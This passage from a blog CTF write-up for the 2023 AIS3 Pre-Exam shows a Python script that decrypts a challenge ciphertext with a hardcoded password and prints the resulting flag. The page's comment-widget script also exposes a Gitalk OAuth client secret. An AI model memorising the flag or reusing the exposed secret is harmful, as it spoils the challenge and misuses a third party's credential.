<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> cryptography.fernet <span class="keyword">import</span> Fernet</span><br><span class="line"><span class="keyword">from</span> Crypto.Hash <span class="keyword">import</span> SHA256</span><br><span class="line"><span class="keyword">from</span> Crypto.Protocol.KDF <span class="keyword">import</span> PBKDF2</span><br><span class="line">cipher=<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">iAkZMT9sfXIjD3yIpw0ldGdBQUFBQUJrVzAwb0pUTUdFbzJYeU0tTGQ4OUUzQXZhaU9HMmlO</span></span><br><span class="line"><span class="string">aC1PcnFqRUIzX0xtZXg0MTh1TXFNYjBLXzVBOVA3a0FaenZqOU1sNGhBcHR3Z21RTTdmN1dQUkcxZ1Ja</span></span><br><span class="line"><span class="string">OGZLQ0E0WmVMSjZQTXN3Z252VWRtdXlaVW1fZ0pzV0xsaUM5VjR1ZHdj</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">cipher=cipher.encode()</span><br><span class="line">cipher=base64.b64decode(cipher)</span><br><span class="line">salt=cipher[:<span class="number">16</span>]</span><br><span class="line">cipher=cipher[<span class="number">16</span>:]</span><br><span class="line"><span class="built_in">print</span>(salt)</span><br><span class="line"><span class="built_in">print</span>(cipher)</span><br><span class="line">leak_password = <span class="string">&#x27;mysecretpassword&#x27;</span></span><br><span class="line">key = PBKDF2(leak_password.encode(), salt, <span class="number">32</span>, count=<span class="number">1000</span>, hmac_hash_module=SHA256)  </span><br><span class="line">f = Fernet(base64.urlsafe_b64encode(key))  </span><br><span class="line">plaintext=f.decrypt(cipher)</span><br><span class="line"><span class="built_in">print</span>(plaintext)</span><br></pre></td></tr></table></figure>
<blockquote>
<p>FLAG{W3lc0m3_t0_th3_CTF_W0rld_!!<em>!!!</em>!}</p>
</blockquote>
</div><div class="article-licensing box"><div class="licensing-title"><p>2023 AIS3 Pre-Exam writeup</p><p><a href="https://trianglesnake.com/2024/02/07/2023-AIS3-Pre-Exam-writeup/">https://trianglesnake.com/2024/02/07/2023-AIS3-Pre-Exam-writeup/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>TriangleSnake</p></div></div><div class="level-item is-narrow"><div><h6>發表於</h6><p>2024-02-07</p></div></div><div class="level-item is-narrow"><div><h6>更新於</h6><p>2024-11-17</p></div></div><div class="level-item is-narrow"><div><h6>許可協議</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/writeup/">writeup</a></div><div class="sharethis-inline-share-buttons"></div><script src="https://platform-api.sharethis.com/js/sharethis.js#property=65c33eb8deab3e0019fa00c6&amp;product=inline-share-buttons&amp;source=platform" defer></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2024/04/30/CTF-Cheatsheet-Web/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CTF Cheatsheet - Web</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2024/02/06/2024-AIS3-EOF-CTF-Qual-writeup/"><span class="level-item">2024 AIS3 EOF CTF Qual writeup</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">評論</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js"></script><script>var gitalk = new Gitalk({
            id: "bfa0b8168f45605712c7c2f6b4b55624",
            repo: "TriangleSnake.github.io",
            owner: "TriangleSnake",
            clientID: "d29b4eacb9372bfb5f33",
            clientSecret: "8aa5a12d9bf6297f5c87be0f56efd87c1ff20e15",
            admin: ["TriangleSnake"],
            createIssueManually: false,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: "last",
            
            
            enableHotKey: true,
            language: "zh-TW",
        })
        gitalk.render('comment-container')</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="https://avatars.githubusercontent.com/u/46417323" alt="TriangleSnake"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">TriangleSnake</p><p class="is-size-6 is-block">National Cheng Kung University</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Taiwan</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">11</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分類</p><a href="/categories"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">標籤</p><a href="/tags"><p class="title">15</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/TriangleSnake" target="_blank" rel="me noopener">追蹤</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/TriangleSnake"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a></div></div></div><!--!--><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分類</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/Cybersecurity/"><span class="level-start"><span class="level-item">Cybersecurity</span></span><span class="level-end"><span class="level-item tag">9</span></span></a><ul><li><a class="level is-mobile" href="/categories/Cybersecurity/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">7</span></span></a><ul><li><a class="level is-mobile" href="/categories/Cybersecurity/CTF/Cheatsheet/"><span class="level-start"><span class="level-item">Cheatsheet</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/Cybersecurity/CTF/Writeup/"><span class="level-start"><span class="level-item">Writeup</span></span><span class="level-end"><span class="level-item tag">6</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/Cybersecurity/CVE/"><span class="level-start"><span class="level-item">CVE</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/Others/"><span class="level-start"><span class="level-item">Others</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li></ul></div></div></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-12-07T11:30:27.000Z">2024-12-07</time></p><p class="title"><a href="/2024/12/07/2024-CGGC-CTF-Final-Writeup/">2024 CGGC CTF Final Writeup</a></p><p class="categories"><a href="/categories/Cybersecurity/">Cybersecurity</a> / <a href="/categories/Cybersecurity/CTF/">CTF</a> / <a href="/categories/Cybersecurity/CTF/Writeup/">Writeup</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-18T11:22:14.000Z">2024-11-18</time></p><p class="title"><a href="/2024/11/18/%E8%B7%A8%E7%A7%91%E7%B3%BB%E6%8E%A8%E7%94%84%E5%9B%9B%E5%A4%A7%E8%B3%87%E5%AE%89%E6%89%80%E6%8E%A8%E7%94%84%E5%BF%83%E5%BE%97/">跨科系推甄四大資安所推甄心得</a></p><p class="categories"><a href="/categories/Others/">Others</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-10-30T18:02:43.000Z">2024-10-31</time></p><p class="title"><a href="/2024/10/31/One-Million-ASUS-Routers-Under-Control-Exploiting-ASUS-DDNS-to-MITM-Admin-Credentials/">One Million ASUS Routers Under Control: Exploiting ASUS DDNS to MITM Admin Credentials</a></p><p class="categories"><a href="/categories/Cybersecurity/">Cybersecurity</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-08-08T08:32:52.000Z">2024-08-08</time></p><p class="title"><a href="/2024/08/08/CVE-2024-4577-PHP-CGI%E6%BC%8F%E6%B4%9E%E8%A4%87%E7%8F%BE%E5%8F%8A%E7%A0%94%E7%A9%B6/">CVE-2024-4577 PHP CGI漏洞複現及研究</a></p><p class="categories"><a href="/categories/Cybersecurity/">Cybersecurity</a> / <a href="/categories/Cybersecurity/CVE/">CVE</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-06-30T06:04:15.000Z">2024-06-30</time></p><p class="title"><a href="/2024/06/30/2024-AIS3-pre-exam-MFCTF-writeup/">2024 AIS3 pre-exam &amp; MFCTF writeup</a></p><p class="categories"><a href="/categories/Cybersecurity/">Cybersecurity</a> / <a href="/categories/Cybersecurity/CTF/">CTF</a> / <a href="/categories/Cybersecurity/CTF/Writeup/">Writeup</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">彙整</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2024/12/"><span class="level-start"><span class="level-item">十二月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/11/"><span class="level-start"><span class="level-item">十一月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/10/"><span class="level-start"><span class="level-item">十月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/08/"><span class="level-start"><span class="level-item">八月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/06/"><span class="level-start"><span class="level-item">六月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/05/"><span class="level-start"><span class="level-item">五月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/04/"><span class="level-start"><span class="level-item">四月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/02/"><span class="level-start"><span class="level-item">二月 2024</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/12/"><span class="level-start"><span class="level-item">十二月 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/05/"><span class="level-start"><span class="level-item">五月 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">標籤</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/CTF/"><span class="tag">CTF</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/CVE/"><span class="tag">CVE</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/PHP/"><span class="tag">PHP</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/SQLi/"><span class="tag">SQLi</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/argument-injection/"><span class="tag">argument injection</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/command-injection/"><span class="tag">command injection</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/linux/"><span class="tag">linux</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/misc/"><span class="tag">misc</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/proxmox/"><span class="tag">proxmox</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/reverse/"><span class="tag">reverse</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/web/"><span class="tag">web</span><span class="tag">6</span></a></div><div class="control"><a class="tags has-addons" href="/tags/writeup/"><span class="tag">writeup</span><span class="tag">6</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%8E%A8%E7%94%84/"><span class="tag">推甄</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%A0%94%E7%A9%B6%E6%89%80/"><span class="tag">研究所</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E8%B3%87%E5%AE%89/"><span class="tag">資安</span><span class="tag">1</span></a></div></div></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/triblog.svg" alt="TriangeSnake&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2024 TriangleSnake</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p><p class="is-size-7">© 2024</p></div><div class="level-end"></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-tw");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到頁首" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="請輸入關鍵字..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"請輸入關鍵字...","untitled":"(無標題)","posts":"文章","pages":"頁面","categories":"分類","tags":"標籤"});
        });</script></body></html>